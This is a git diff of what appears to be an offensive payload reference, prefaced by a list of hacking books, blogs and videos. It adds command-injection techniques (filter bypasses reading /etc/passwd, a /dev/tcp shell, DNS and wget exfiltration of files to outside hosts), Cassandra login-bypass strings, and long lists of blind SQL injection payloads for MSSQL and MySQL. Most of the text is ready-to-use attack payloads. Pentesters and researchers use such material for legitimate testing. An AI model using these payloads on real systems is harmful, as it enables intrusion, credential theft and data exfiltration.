 * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 * [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 ### Blogs/Websites
 * http://blog.zsec.uk/101-web-testing-tooling/
 * https://blog.innerht.ml
 * https://blog.zsec.uk
 * https://www.exploit-db.com/google-hacking-database
 * https://www.arneswinnen.net
 * https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
 ### Youtube
 * [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 * [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 * [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 * [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
--- a/execution/README.md
+++ b/execution/README.md
@@ -1,9 +1,12 @@
 # Remote Commands Execution
 Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
 Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
 NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
 ## Exploits
 Normal Commands execution, execute the command and voila :p
 ```powershell
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
@@ -13,6 +16,7 @@ sys:x:3:3:sys:/dev:/bin/sh
 ```
 Commands execution by chaining commands
 ```powershell
 original_cmd_by_server; ls
 original_cmd_by_server && ls
@@ -21,12 +25,14 @@ original_cmd_by_server || ls    Only if the first cmd fail
 ```
 Commands execution inside a command
 ```powershell
 original_cmd_by_server `cat /etc/passwd`
 original_cmd_by_server $(cat /etc/passwd)
 ```
 Commands execution without space - Linux
 ```powershell
 swissky@crashlab:~/Www$ cat</etc/passwd
 root:x:0:0:root:/root:/bin/bash
@@ -51,80 +57,104 @@ swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 Commands execution without space - Windows
 ```powershell
 ping%CommonProgramFiles:~10,-18%IP
 ping%PROGRAMFILES:~10,-5%IP
 ```
 Commands execution without spaces, $ or { } - Linux (Bash only)
 ```powershell
 IFS=,;`cat<<<uname,-a`
 ```
 Commands execution with a line return
 ```powershell
 something%0Acat%20/etc/passwd
 ```
 Bypass blacklisted word with single quote
 ```powershell
 w'h'o'am'i
 ```
 Bypass blacklisted word with double quote
 ```powershell
 w"h"o"am"i
 ```
-Bypass blacklisted word with backslash
+Bypass blacklisted word with backslash and slash
 ```powershell
-w\ho\am\i 
+w\ho\am\i
 /\b\i\n/////s\h
 ```
 Bypass blacklisted word with $@
 ```powershell
 who$@ami
 ```
 Bypass blacklisted word with variable expansion
 ```powershell
 /???/??t /???/p??s??
 test=/ehhh/hmtc/pahhh/hmsswd
 cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```
 Bypass zsh/bash/sh blacklist
 ```powershell
 echo $0
 -> /usr/bin/zsh
 echo whoami|$0
 ```
 ## Challenge
 Challenge based on the previous tricks, what does the following command do:
 ```powershell
 g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 ```
 ## Time based data exfiltration
 Extracting data : char by char
 ```powershell
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
-real	0m5.007s
+real    0m5.007s
-user	0m0.000s
+user    0m0.000s
-sys	0m0.000s
+sys 0m0.000s
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
-real	0m0.002s
+real    0m0.002s
-user	0m0.000s
+user    0m0.000s
-sys	0m0.000s
+sys 0m0.000s
 ```
 ## DNS based data exfiltration
-Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca
+
-```
+Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
 ```powershell
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 ## Environment based
 NodeJS Commands execution
 ```powershell
 require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
 ```
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
 * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
--- a/injection/Cassandra
+++ b/injection/Cassandra
@@ -0,0 +1,37 @@
 # Cassandra Injection
 > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
 ## Cassandra comment
 ```sql
 /* Cassandra Comment */
 ```
 ## Cassandra - Login Bypass
 ### Login Bypass 0
 ```sql
 username: admin' ALLOW FILTERING; %00
 password: ANY
 ```
 ### Login Bypass 1
 ```sql
 username: admin'/*
 password: */and pass>'
 ```
 The injection would look like the following SQL query
 ```sql
 SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
 ```
 Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
 ## Thanks to
 * [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
--- a/injection/Intruders/SQL-Injection
+++ b/injection/Intruders/SQL-Injection
@@ -0,0 +1,88 @@
 '
 ''
 `
 ``
 ,
 "
 ""
 /
 //
 \
 \\
 ;
 ' or "
 -- or # 
 ' OR '1
 ' OR 1 -- -
 " OR "" = "
 " OR 1 = 1 -- -
 ' OR '' = '
 '='
 'LIKE'
 '=0--+
 OR 1=1
 ' OR 'x'='x
 ' AND id IS NULL; --
 '''''''''''''UNION SELECT '2
 %00
 /*…*/ 
 +		addition, concatenate (or space in url)
 ||		(double pipe) concatenate
 %		wildcard attribute indicator
@variable	local variable
@@variable	global variable
 # Numeric
 AND 1
 AND 0
 AND true
 AND false
 1-false
 1-true
 1*56
 -2
 1' ORDER BY 1--+
 1' ORDER BY 2--+
 1' ORDER BY 3--+
 1' ORDER BY 1,2--+
 1' ORDER BY 1,2,3--+
 1' GROUP BY 1,2,--+
 1' GROUP BY 1,2,3--+
 ' GROUP BY columnnames having 1=1 --
 -1' UNION SELECT 1,2,3--+
 ' UNION SELECT sum(columnname ) from tablename --
 -1 UNION SELECT 1 INTO @,@
 -1 UNION SELECT 1 INTO @,@,@
 1 AND (SELECT * FROM Users) = 1	
 ' AND MID(VERSION(),1,1) = '5';
 ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
 Finding the table name
 Time-Based:
 ,(select * from (select(sleep(10)))a)
 %2c(select%20*%20from%20(select(sleep(10)))a)
 ';WAITFOR DELAY '0:0:30'--
 Comments:
 #	    Hash comment
 /*  	C-style comment
 -- -	SQL comment
 ;%00	Nullbyte
 `	    Backtick
--- a/injection/Intruders/payloads-sql-blind-MSSQL-INSERT
+++ b/injection/Intruders/payloads-sql-blind-MSSQL-INSERT
@@ -0,0 +1,107 @@
 )%20waitfor%20delay%20'0:0:20'%20/*
 )%20waitfor%20delay%20'0:0:20'%20--
 ')%20waitfor%20delay%20'0:0:20'%20/*
 ')%20waitfor%20delay%20'0:0:20'%20--
 ")%20waitfor%20delay%20'0:0:20'%20/*
 ")%20waitfor%20delay%20'0:0:20'%20--
 ))%20waitfor%20delay%20'0:0:20'%20/*
 ))%20waitfor%20delay%20'0:0:20'%20--
 '))%20waitfor%20delay%20'0:0:20'%20/*
 '))%20waitfor%20delay%20'0:0:20'%20--
 "))%20waitfor%20delay%20'0:0:20'%20/*
 "))%20waitfor%20delay%20'0:0:20'%20--
 ,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL)%20waifor%20delay%20'0:0:20'%20/*
 ',NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL)%20waifor%20delay%20'0:0:20'%20/*
 '),NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
--- a/injection/Intruders/payloads-sql-blind-MSSQL-WHERE
+++ b/injection/Intruders/payloads-sql-blind-MSSQL-WHERE
@@ -0,0 +1,40 @@
 waitfor delay '0:0:20' /* 
 waitfor delay '0:0:20' --
 ' waitfor delay '0:0:20' /* 
 ' waitfor delay '0:0:20' --
 " waitfor delay '0:0:20' /* 
 " waitfor delay '0:0:20' --
 ) waitfor delay '0:0:20' /* 
 ) waitfor delay '0:0:20' --
 )) waitfor delay '0:0:20' /* 
 )) waitfor delay '0:0:20' --
 ))) waitfor delay '0:0:20' /* 
 ))) waitfor delay '0:0:20' --
 )))) waitfor delay '0:0:20' /* 
 )))) waitfor delay '0:0:20' --
 ))))) waitfor delay '0:0:20' --
 )))))) waitfor delay '0:0:20' --
 ') waitfor delay '0:0:20' /* 
 ') waitfor delay '0:0:20' --
 ") waitfor delay '0:0:20' /* 
 ") waitfor delay '0:0:20' --
 ')) waitfor delay '0:0:20' /* 
 ')) waitfor delay '0:0:20' --
 ")) waitfor delay '0:0:20' /* 
 ")) waitfor delay '0:0:20' --
 '))) waitfor delay '0:0:20' /* 
 '))) waitfor delay '0:0:20' --
 "))) waitfor delay '0:0:20' /* 
 "))) waitfor delay '0:0:20' --
 ')))) waitfor delay '0:0:20' /* 
 ')))) waitfor delay '0:0:20' --
 ")))) waitfor delay '0:0:20' /* 
 ")))) waitfor delay '0:0:20' --
 '))))) waitfor delay '0:0:20' /* 
 '))))) waitfor delay '0:0:20' --
 "))))) waitfor delay '0:0:20' /* 
 "))))) waitfor delay '0:0:20' --
 ')))))) waitfor delay '0:0:20' /* 
 ')))))) waitfor delay '0:0:20' --
 ")))))) waitfor delay '0:0:20' /* 
 ")))))) waitfor delay '0:0:20' --
--- a/injection/Intruders/payloads-sql-blind-MySQL-INSERT
+++ b/injection/Intruders/payloads-sql-blind-MySQL-INSERT
@@ -0,0 +1,90 @@
 +if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* 
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
--- a/injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
+++ b/injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
@@ -0,0 +1,18 @@
 ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
